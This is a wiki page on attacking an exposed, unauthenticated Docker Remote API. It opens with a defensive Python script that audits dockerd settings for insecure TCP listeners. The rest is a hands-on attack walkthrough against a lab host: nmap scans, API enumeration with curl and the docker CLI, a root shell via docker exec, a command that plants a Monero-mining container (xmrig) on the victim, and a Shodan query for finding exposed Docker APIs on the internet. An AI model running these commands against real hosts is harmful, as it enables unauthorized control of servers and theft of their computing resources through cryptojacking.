====== Docker - Security - Attack Docker exposed API ======
If you have enabled Docker Remote API, per [[Docker:Enable Docker Remote API|Enable Docker Remote API]], you may be vulnerable to attacks.
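The exposure this page exploits comes from a single daemon setting: a ''tcp://'' listener without ''--tlsverify''. The following audit script is an added example (not part of the original page) that reads a ''daemon.json'' and a ''dockerd'' command line and reports every TCP listener that accepts unauthenticated clients or binds to all interfaces. The sample configurations are constructed; the keys and flags (''hosts''/''-H'', ''tls''/''--tls'', ''tlsverify''/''--tlsverify'') are the real dockerd ones.

```python
import json
import shlex
from typing import Dict, List

# Constructed sample inputs (not from the original page): a daemon.json as written when
# following "Enable Docker Remote API", the equivalent flag-based command line, and a
# hardened variant with mutual TLS bound to a specific management address.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:1234"]}'
WEAK_CMDLINE = "dockerd -H unix:///var/run/docker.sock -H tcp://0.0.0.0:1234"
HARDENED_CMDLINE = ("dockerd -H tcp://192.168.1.118:2376 --tlsverify "
                    "--tlscacert=/etc/docker/ca.pem --tlscert=/etc/docker/server-cert.pem "
                    "--tlskey=/etc/docker/server-key.pem")

def parse_dockerd_settings(daemon_json: str, cmdline: str) -> Dict[str, object]:
    """Merge daemon.json keys and dockerd flags into {hosts, tls, tlsverify}.
    dockerd refuses to start when the same directive (e.g. hosts) is set in both
    places, so a realistic input sets each directive in only one of them."""
    cfg = json.loads(daemon_json) if daemon_json.strip() else {}
    hosts = list(cfg.get("hosts", []))
    tls = bool(cfg.get("tls", False))
    tlsverify = bool(cfg.get("tlsverify", False))
    argv = shlex.split(cmdline)
    i = 0
    while i < len(argv):
        flag, _, value = argv[i].partition("=")   # handles both "-H x" and "--host=x"
        if flag in ("-H", "--host"):
            if not value and i + 1 < len(argv):
                i += 1
                value = argv[i]
            hosts.append(value)
        elif flag == "--tls":
            tls = value.lower() != "false"        # bare "--tls" means true
        elif flag == "--tlsverify":
            tlsverify = value.lower() != "false"  # "--tlsverify=false" switches it off
        i += 1
    return {"hosts": hosts, "tls": tls, "tlsverify": tlsverify}

def audit_docker_daemon(daemon_json: str, cmdline: str) -> List[str]:
    """Return one finding per TCP listener that lacks client-certificate
    verification, plus one per listener bound to every interface."""
    s = parse_dockerd_settings(daemon_json, cmdline)
    findings = []
    for h in s["hosts"]:
        if not h.startswith("tcp://"):
            continue                              # unix:// and fd:// are local only
        if not s["tlsverify"]:
            how = "encrypted by --tls but" if s["tls"] else "plaintext and"
            findings.append(f"{h}: {how} unauthenticated (no --tlsverify); "
                            f"any client reaching the port controls the daemon as root")
        bind = h[len("tcp://"):].rsplit(":", 1)[0]
        if bind in ("", "0.0.0.0", "[::]", "::"):
            findings.append(f"{h}: bound to all interfaces; bind to a management "
                            f"address and firewall the port")
    return findings
```

Run it against the host's real ''/etc/docker/daemon.json'' and the ''dockerd'' line from ''ps -ef'' (or the systemd unit); an empty list means no unauthenticated TCP listener is configured.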
----
===== Information Gathering & Enumeration =====
===== Do a port scan =====
<code>
sudo nmap -sS -T5 192.168.1.118 -p-

Starting Nmap 7.01 ( https://nmap.org ) at 2017-04-11 12:37 CEST
Nmap scan report for 192.168.1.118
Host is up (0.00076s latency).
Not shown: 65498 closed ports, 35 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
1234/tcp open  docker
MAC Address: 0C:01:67:8A:63:F2 (Oracle VirtualBox virtual NIC)
</code>
I had to scan more ports than the default top 1000 because the docker API port is not included :(
Ok then, what about service detection?
<code>
nmap -sTV -p 1234 192.168.1.118

Starting Nmap 7.01 ( https://nmap.org ) at 2017-04-11 12:43 CEST
Nmap scan report for 192.168.1.118
Host is up (0.00038s latency).
PORT     STATE SERVICE    VERSION
1234/tcp open  18.06.0-ce Docker
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.65 seconds
</code>
This confirms that we are dealing with Docker.
nmap also discovered the exact version of Docker. If we want to confirm it manually, we can issue a GET request to the unauthenticated ''/version'' endpoint, i.e. ''http://<host>:1234/version'':
<code bash>
curl -s http://192.168.1.118:1234/version | python -m json.tool
</code>
**NOTE:** Claudio Criscione wrote an nmap script to do this ([[https://github.com/paradoxengine|His GitHub page]]).
----
===== Test the exposed API using the docker CLI =====
<code bash>
docker -H 192.168.1.118:1234 info
</code>
----
==== Gather Information ====
Are there some containers running?
<code bash>
docker -H 192.168.1.118:1234 ps
</code>
----
Are there some stopped containers?
<code bash>
docker -H 192.168.1.118:1234 ps -a
</code>
----
What are the images pulled on the host machine?
<code bash>
docker -H 192.168.1.118:1234 images
</code>
----
===== Accessing the container =====
Spawn a bash shell in a running container (the container ID comes from the ''docker ps'' output above; ''<container_id>'' is a placeholder):
<code bash>
docker -H 192.168.1.118:1234 exec -it <container_id> /bin/bash
</code>
Check ownership:
<code>
whoami && id

root
uid=0(root) gid=0(root) groups=0(root)
</code>
**NOTE:** Already root!!!
The default user inside a container is **root**.
Once inside a container you can start digging for some useful information.
----
===== Launching other containers =====
A funny thing that you can do is launch other containers; this is not very stealthy, but it can be useful.
Following the crypto-mining trend, this blog post explains how to mine monero with docker:
* https://getmonero.org/resources/user-guides/mining_with_xmrig_and_docker.html
You can have a look inside the Dockerfile at this link from DockerHub.
You could easily launch a mining container with the following command:
<code bash>
docker -H 192.168.1.118:1234 run --restart unless-stopped --read-only -m 50M -c 512 bitnn/alpine-xmrig -o POOL01 -o POOL02 -u WALLET -p PASSWORD -k
</code>
----
===== Find exposed Docker API =====
* https://www.shodan.io/
* Search for: **Product:"Docker"**